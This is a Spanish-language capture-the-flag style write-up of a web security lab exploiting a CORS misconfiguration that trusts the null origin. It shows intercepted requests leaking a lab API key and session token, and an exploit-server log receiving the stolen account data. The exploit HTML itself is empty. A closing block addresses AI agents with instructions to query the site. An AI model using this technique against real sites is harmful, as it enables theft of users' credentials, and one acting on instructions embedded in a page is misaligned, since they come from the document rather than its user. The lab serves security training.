# Lab #2 - CORS vulnerability with trusted null origin Primero iniciamos sesion y capturamos la siguiente peticion: ```bash GET /accountDetails HTTP/2 Host: 0a8f00470434b5eb82a6608000940062.web-security-academy.net Cookie: session=xiK3cUebAhOGCT8zA32s8KBvOIZcPLQe Sec-Ch-Ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128" Sec-Ch-Ua-Mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Sec-Ch-Ua-Platform: "Windows" Accept: */* Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://0a8f00470434b5eb82a6608000940062.web-security-academy.net/my-account?id=wiener Accept-Encoding: gzip, deflate, br Accept-Language: es-ES,es;q=0.9 Priority: u=1, i ``` Y la respuesta de esta peticion es la siguiente: ```bash HTTP/2 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json; charset=utf-8 X-Frame-Options: SAMEORIGIN Content-Length: 149 { "username": "wiener", "email": "", "apikey": "tiJ50DYM9AoTgxTZppTOS0cjWn3w7fHG", "sessions": [ "xiK3cUebAhOGCT8zA32s8KBvOIZcPLQe" ] } ``` Se puede apreciar Access-Control-Allow-Credentials: true y por lo anterior, enviamos la siguiente peticion: ``` GET /accountDetails HTTP/2 Host: 0a8f00470434b5eb82a6608000940062.web-security-academy.net Cookie: session=xiK3cUebAhOGCT8zA32s8KBvOIZcPLQe Origin: null Sec-Ch-Ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128" Sec-Ch-Ua-Mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Sec-Ch-Ua-Platform: "Windows" Accept: */* Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://0a8f00470434b5eb82a6608000940062.web-security-academy.net/my-account?id=wiener Accept-Encoding: gzip, deflate, br Accept-Language: es-ES,es;q=0.9 Priority: u=1, i ``` Esto responde asi: ``` HTTP/2 200 OK Access-Control-Allow-Origin: null Access-Control-Allow-Credentials: true Content-Type: application/json; charset=utf-8 X-Frame-Options: SAMEORIGIN Content-Length: 149 { "username": "wiener", "email": "", "apikey": "tiJ50DYM9AoTgxTZppTOS0cjWn3w7fHG", "sessions": [ "xiK3cUebAhOGCT8zA32s8KBvOIZcPLQe" ] } ``` Luego de lo anterior, se procede a crear el exploit para almacenarlo en el exploit server: ```html ``` Y luego de enviar el exploit a la victima se recibe lo siguiente: {% code overflow="wrap" %} ```bash 200.122.242.138 2024-06-28 20:17:04 +0000 "GET /log?key=%7B%0A%20%20%22username%22%3A%20%22wiener%22%2C%0A%20%20%22email%22%3A%20%22%22%2C%0A%20%20%22apikey%22%3A%20%22tiJ50DYM9AoTgxTZppTOS0cjWn3w7fHG%22%2C%0A%20%20%22sessions%22%3A%20%5B%0A%20%20%20%20%22xiK3cUebAhOGCT8zA32s8KBvOIZcPLQe%22%0A%20%20%5D%0A%7D HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" ``` {% endcode %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://books.spartan-cybersec.com/web/cors/lab-2-cors-vulnerability-with-trusted-null-origin.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.